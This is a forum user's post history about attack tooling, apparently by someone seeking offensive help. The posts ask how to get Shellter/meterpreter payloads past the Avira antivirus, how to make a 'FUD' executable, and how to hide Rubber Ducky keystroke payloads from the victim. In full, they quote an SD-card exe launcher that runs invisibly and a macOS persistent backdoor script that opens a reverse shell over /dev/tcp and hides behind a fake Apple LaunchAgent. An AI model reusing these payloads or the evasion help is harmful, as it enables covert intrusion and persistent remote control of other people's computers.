Net_Spy


  1. I recently read an article and some research paper about turning your wifi into an IMSI catcher. I would love to work on it; can anyone guide me on where to get started? What stuff do I need to turn my wifi into an IMSI catcher? Looking forward to your kind response. Regards
  2. @PoSHMagiC0de Thanks. I've tried both staged and stageless as well, and yes, Avira does have a firewall. I've tried on another machine on the same network but with Avira installed, and it does establish a connection with a meterpreter session. Can you help me to sort it out and bypass it? I could not figure it out. Looking forward to your kind response. Regards Net_Spy
  3. Greetings, I've created a payload using Shellter with injection using the putty binary. The file is not detected by AV, but the payload does not send a connection back to the metasploit machine; if I disable the Avira AV, the payload executes successfully. Can anyone help me to deal with this while AV is enabled, and bypass it as well to get a successful connection? Looking forward to your kind response. Regards Net_Spy
  4. Hello, I'm confused about deciding on the best adapter which supports long range and the latest 801.02 protocol. Can anyone suggest an antenna + adapter? Thanks
  5. Hi, I've searched the forum for a Mac payload and found two scripts that do not work on Mac. I need a script to run and make that persistent, or to run a file via SD card. Looking forward to your kind response. Regards Net_Spy
  6. I've renamed my drive to the same and the file to t.exe. I'm trying it on Windows 7. Regards Net_Spy
  7. Greetings, I've come across a script that claims to be faster than the script written by overwraith: REM Author: overwraith REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. 
REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER overwraith's script is working great, only taking a few seconds and lots of commands. Following is the shortened script: DELAY 3000 GUI r DELAY 100 cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe DELAY 10 ENTER I've tried it but failed to execute it. It gives the error: Windows cannot find 'c'. Make sure you typed the name correctly, and then try again. Is there any way to make the above short script run an exe from SD? Regards Net_Spy
  8. @V3sth4cks153 Do I need to make the USB firmware twin composite for that or not? Regards Net_Spy
  9. Greetings, I'm looking for a payload for the Rubber Ducky to execute on Mac OS and give a persistent connection even after a restart of the target. I've found the script below, which can only initiate a reverse connection once. Can anyone help me make it persistent, to run the reverse connection payload after each reboot or when the machine comes back online after shutdown? Here is the script made by Patrick: REM Patrick Mosca REM A simple script for creating a persistent backdoor on OSX. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 GUI SPACE STRING terminal DELAY 500 ENTER DELAY 500 STRING mkdir ~/Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > ~/Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x ~/Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir ~/Library/LaunchAgents ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>'$HOME'/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 GUI q
  10. Thanks, but I just wanted to hide those windows which are opened via the above-mentioned script, like opening the run prompt and typing a command, then opening cmd, minimizing it, etc. I only want to know whether there is a way to do all of this silently. Regards Net_Spy
  11. It does not work. I've installed the twin composite firmware and it worked. One more thing I would like to know: is there any way for the payload to run without any popup windows? Looking forward to your kind response. Regards Net_Spy
  12. Furthermore, I did a little firmware update before the above, firmware duck_v2.1.hex. Steps followed from here using Ubuntu: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky#Flashing_the_Firmware Number written on chip: 32uc3b1256 Regards Net_Spy
  13. Well, I've generated the following payload with the help of the GUI encoder. REM Author: overwraith REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\form1.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER I copied the exe into the SD card root path and inject.bin as well, then plugged it into Windows XP. It shows all the commands on the cmd screen but the exe does not execute. Regards Net_Spy
  14. Greetings, I would like to set up the Rubber Ducky USB. I would appreciate your assistance, and I would like to FUD my remote assistant tool exe as well. Any idea how to get this using Veil or any other good method to FUD it with 0 detection? Thanks Regards